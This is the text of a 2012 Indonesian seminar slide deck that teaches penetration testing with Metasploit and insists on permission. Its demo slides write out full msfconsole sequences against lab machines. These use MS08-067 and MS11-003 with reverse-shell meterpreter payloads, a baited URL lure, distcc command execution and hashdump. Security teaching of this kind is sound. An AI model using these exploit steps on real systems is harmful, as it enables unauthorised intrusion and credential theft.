penetration testing with metasploit Presented by Syarif Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang
May 13, 2015
penetration testing with metasploit
Presented by Syarif
!Seminar IT Security Safe The System
Sumedang, April 29 2012 STMIK Sumedang
Agenda
• Why & What’s Penetration Testing ( Pentest )
• << back|track Overview
• Metasploit Basics & Meterpreter
• DEMO :)
Whoami
• geek & Pentester
• infosec trouble maker
• InfoSec enthusiast
• CyberCrime investigator
• Lecture & Engineer
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)
• Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing
• A method to evaluate the security of computer system / network
• Practice ( attacking ) an IT System like a ‘hacker’ does
• Find security holes ( weaknesses )
• Bypass security mechanism
• Compromise an organization’s IT system security
Must have permission from IT system owner !
illegal activity put you in Jail
Ethics
• Think before act
• Don’t be stupid
• Don’t be malicious
Pentest Phases
Vulnerability Analysis
Information Gathering
Exploitation
Post Exploitation
Reporting
<< back|track overview
• Let’s Watch the Video :)
<< back|track overview
• .
The Most Advanced Linux Security Distribution
Open Source & Always be
Developed for Security Professional
Real World Pentesting Tools
<< back|track overview
<< back|track overview
What’s
• Not just a tool, but an entire framework *1)
• an Open source platform for writing security tools and exploits *2)
• Easily build attack vectors to add its exploits, payloads, encoders,
• Create and execute more advanced attack
• Ruby based
Metasploit interfaces
• MSFconsole
• MSFcli
• msfweb, msfgui ( discontinued )
• Metasploit Pro, Metasploit Express
• Armitage
MSFconsole
MSFcli
Metasploit Terminology
• Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1)
• Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1)
• Shellcode : a set of instructions used as payload when exploitation occurs *1)
• Module : a software that can be used by metasploit *1)
• Listener : a component for waiting an incoming connection *1)
How does exploitation works
attacker
exploit + payload
vulnerable server
1
exploit run , then payload run2
3 Upload / Download data
Traditional Pentest Vs Metasploit
Public Exploit Gathering
Change offsets
Replace ShellCode
Load Metasploit
Choose the target OS
Use exploit
SET Payload
Execute
Traditional Pentest Metasploit for Pentest
Meterpreter
• as a payload after vulnerability is exploited *1)
• Improve the post exploitation
Meterpreter
Exploiting a vulnerability
Select a meterpreter as a payload
meterpreter shell
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Pentest Scenario
attacker vulnerable OS on VMware
* : Ubuntu 8.04 metasploitable
*
OS in the Lab• BackTrack 5 R 2
• IP address : 172.16.240.143
• Windows Xp SP 2
• IP address : 172.16.240.129
• Windows 2003 Server
• IP address : 172.16.240.141
• Windows 7
• IP address : 172.16.240.142
• Ubuntu Linux 8.04 ( Metasploitable )
• IP address : 172.16.240.144
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
Windows XP Post Exploitation
• session -i 1
• meterpreter > getsystem -h
• getuid
• hashdump
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
Windows 7 Exploitation
• msf exploit(ms11_003_ie_css_import) > sessions -l
• msf exploit(ms11_003_ie_css_import) > sessions -i 1
• meterpreter > sysinfo
• meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.240.144
• set lhost 172.16.240.143
• exploit
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
References !
!
• 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines